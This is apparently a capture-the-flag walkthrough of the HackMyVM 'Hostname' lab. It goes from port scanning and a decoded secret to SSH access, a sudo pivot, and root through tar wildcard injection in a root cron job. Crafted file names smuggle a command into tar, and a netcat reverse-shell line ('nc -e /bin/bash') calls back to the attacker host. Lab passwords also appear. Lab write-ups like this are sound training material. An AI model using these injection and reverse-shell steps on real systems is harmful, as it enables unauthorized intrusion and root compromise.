NOTES ABOUT Hostname

[ 2022-10-07 ] [ HackMyVM / Hostname ]

Status: Rooted
Skills: Port Scanning, Static Code Analysis, Wildcard Command Injection, Reverse Shell, Sudo
Tools: nmap, nc

PORT SCANNING

  1. $ nmap -v -sS -A -p- 10.0.2.
  2.  
  3. PORT   STATE SERVICE VERSION
  4. 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
  5. | ssh-hostkey: 
  6. |   3072 27:71:24:58:d3:7c:b3:8a:7b:32:49:d1:c8:0b:4c:ba (RSA)
  7. |   256 e2:30:67:38:7b:db:9a:86:21:01:3e:bf:0e:e7:4f:26 (ECDSA)
  8. |_  256 5d:78:c5:37:a8:58:dd:c4:b6:bd:ce:b5:ba:bf:53:dc (ED25519)
  9. 80/tcp open  http    nginx 1.18.0
  10. |_http-title: Panda
  11. |_http-server-header: nginx/1.18.0

GETTING IN

  1. $ curl -L http://10.0.2.17/
  2.  
  3. [...]
  4.     <div class="form-group">
  5.         <input name="secret" required="required" class="form-control"/>
  6.         <label class="form-label">Secret Word</label>
  7.     </div>
  8.     <div class="form-group">
  9.         <p class="alert">Give Some Input..!!</p>
  10.         <!-- Kung Fu Panda -->
  11.         <button class="btn" name="username" disabled="po">Read</button>
  12.     </div>
  13. </form>
  14.     <link rel="stylesheet" href="./assets/cool.css"><br><br>
  15.     <h2 style="font-size:4vw"><span>I</span>M<span>POSSIBLE</span></h2>
  16.     <script crossorigin="S3VuZ19GdV9QNG5kYQ==" src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
  17.     <script src="./assets/script.js"></script>
  18.  
  19.  
  20. $ echo "S3VuZ19GdV9QNG5kYQ==" | base64 -d
  21. Kung_Fu_P4nda

REMOVED “DISABLED” IN BUTTON TAG WITH FIREFOX DEVELOPER TOOLS.

Pass: Kung_Fu_P4nda

  1. ssh po@10.0.2.17
  2. po@10.0.2.17's password:!ts-bl4nk

ELEVATING PRIVILEGES

  1. $ cat /etc/passwd
  2. root:x:0:0:root:/root:/bin/bash
  3. [...]
  4. po:x:1000:1000::/home/po:/bin/bash
  5. oogway:x:1001:1001::/home/oogway:/bin/bash
  6.  
  7. $ find / -name po 2>/dev/null
  8. /home/po
  9. /etc/sudoers.d/po
  10. /var/lib/sudo/lectured/po
  11.  
  12. $ cat /etc/sudoers.d/po
  13. po HackMyVM = (oogway) NOPASSWD: /bin/bash
  14.  
  15. $ sudo -u oogway -h HackMyVM /bin/bash
  16. oogway@hostname:/$ 
  17.  
  18. $ find / -name *.txt 2>/dev/null
  19. /home/oogway/user.txt
  20.  
  21. $ cat /home/oogway/user.txt
  22.  
  23. $ find / -writable 2>/dev/null
  24. /home/oogway
  25. /home/oogway/.bash_history
  26. /home/oogway/.bash_logout
  27. /home/oogway/.profile
  28. /home/oogway/.bashrc
  29. /home/po/.bash_history
  30. [...]
  31. /opt/secret
  32.  
  33. $ grep -lir "/opt/secret" / 2>/dev/null
  34. /etc/crontab
  35.  
  36. $ cat /etc/crontab
  37. [...]
  38. *  *    * * *   root    cd /opt/secret/ && tar -zcf /var/backups/secret.tgz *
  39. [...]

"[...] bash expands * to be a list of the files and folders rather than passing it on the command [...]"

Tar arbitrary command execution [ WildCards_Gone_Wild.txt ]

NC LISTENER ON LOCAL PORT 80

  1. $ touch -- --checkpoint=1
  2. $ touch -- "--checkpoint-action=exec=sh rs"
  3. $ echo "nc -e /bin/bash 10.0.2.15 80" >rs

WAIT FOR IT...

READ FLAG

  1. $ cat /root/root.txt

  1. $ init 0

--- Loaded 518 times ---